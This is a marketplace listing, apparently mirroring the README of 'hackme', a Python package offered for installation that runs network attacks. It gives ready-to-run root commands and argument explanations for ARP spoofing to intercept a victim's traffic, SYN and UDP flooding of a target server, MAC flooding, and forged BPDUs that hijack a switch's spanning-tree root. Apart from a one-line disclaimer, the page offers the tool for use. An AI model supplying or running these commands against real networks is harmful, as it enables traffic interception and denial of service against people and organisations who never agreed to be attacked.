Hackme 1.0.0 | GitLocker.com Product

hackme 1.0.0

Last updated:

0 purchases

hackme 1.0.0 Image
hackme 1.0.0 Images

Free

Languages

Categories

Add to Cart

Description:

hackme 1.0.0

Hack Me



A collection of scripts that implement different network attacks. For informational purposes only.
Any contributor to this project doesn't take any responsibility for illegal usage of any script from this project.
Installation and Usage
The tested environment:

Python v3.10
Ubuntu 22.04 LTS

Make sure that python3-scapy is installed on your system: sudo apt-get install python3-scapy
You can either run hackmeapp.py from a checkout of the code, or install it like any other python project. Keep in mind that a lot of scripts here can be executed only with the root privileges, so you need to run it with sudo.
$ sudo pip3 install hackme
$ sudo hackme
usage: hackmeapp.py [-h] [--debug] {attack} ...

To enter the debug mode, use the --debug option after the hackme command.
To get the attack description in the terminal, enter hackme <attack> --desc
Implemented Attacks
The following commands include the --debug option, which is not required to execute an attack.
ARP Spoofing
You can read about ARP spoofing attack here.
Example usage:
$ sudo hackme --debug arpspoof -i wlp2s0 -m aa:aa:aa:aa:aa:aa -gm BB-BB-BB-BB-BB-BB -gip 192.168.0.1 -vm cc:cc:cc:cc:cc:cc -vip 192.168.0.108

where:

wlp2s0 — your network interface
aa:aa:aa:aa:aa:aa — the interface MAC-address (can be written as AA:AA:AA:AA:AA:AA, AA-AA-AA-AA-AA-AA and aa-aa-aa-aa-aa-aa)
bb:bb:bb:bb:bb:bb — the gateway's MAC-address
192.168.0.1 — the gateway's IP-address
cc:cc:cc:cc:cc:cc — the victim's MAC-address
192.168.0.108 — the victim's IP-address

Run sudo hackme arpspoof --help to get more information.
SYN Flood
You can read about SYN flood attack here.
Example usage:
$ sudo hackme --debug synflood -d 172.17.17.10 -p 443 -c 1000

where:

172.17.17.10 — server's IP-address
443 — server's port
1000 — the number of packets to be sent

Run sudo hackme synflood --help to get more information.
UDP Flood
You can read about UDP flood attack here.
Example usage:
$ sudo hackme --debug udpflood -d 172.17.17.10 -p 53 -c 1000

where:

172.17.17.10 — server's IP-address
53 — server's port
1000 — the number of packets to be sent

Run sudo hackme udpflood --help to get more information.
MAC Flood
You can read about MAC flood attack here.
Example usage:
$ sudo hackme --debug macflood -i wlp2s0 -vm "aa:aa:aa:aa:aa:aa" -c 100000

where:

wlp2s0 — your network interface
aa:aa:aa:aa:aa:aa — the victim's MAC-address (can be written as AA:AA:AA:AA:AA:AA, AA-AA-AA-AA-AA-AA and aa-aa-aa-aa-aa-aa)
100000 — the number of packets to be sent

Run sudo hackme macflood --help to get more information.
BPDU Spoofing
On a Layer 2 network, switches running STP, RSTP, MSTP, or VBST exchange BPDUs to calculate a spanning tree and trim the network into a loop-free tree topology. If forged BPDUs are sent to attack a device with edge ports and received by them, the device will automatically change the edge ports to non-edge ports and recalculate the spanning tree. If the bridge priority in the BPDUs sent by an attacker is higher than the priority of the root bridge, the network topology will change, thereby interrupting service traffic.
Example usage:
sudo ./hackmeapp.py --debug stpspoof -i wlp2s0 -smac "aa:aa:aa:aa:aa:aa" -dmac "bb:bb:bb:bb:bb:bb" -p 4096


wlp2s0 — your network interface
aa:aa:aa:aa:aa:aa — your MAC-address
bb:bb:bb:bb:bb:bb — victim switch's MAC-address
4096 — priority for choosing the root switch (the lower the number, the higher the priority, so make sure it's low enough to become the root). Must be divisible by 4096

License:

For personal and professional use. You cannot resell or redistribute these repositories in their original state.

Files In This Product: (if this is empty don't purchase this product)

Customer Reviews

There are no reviews.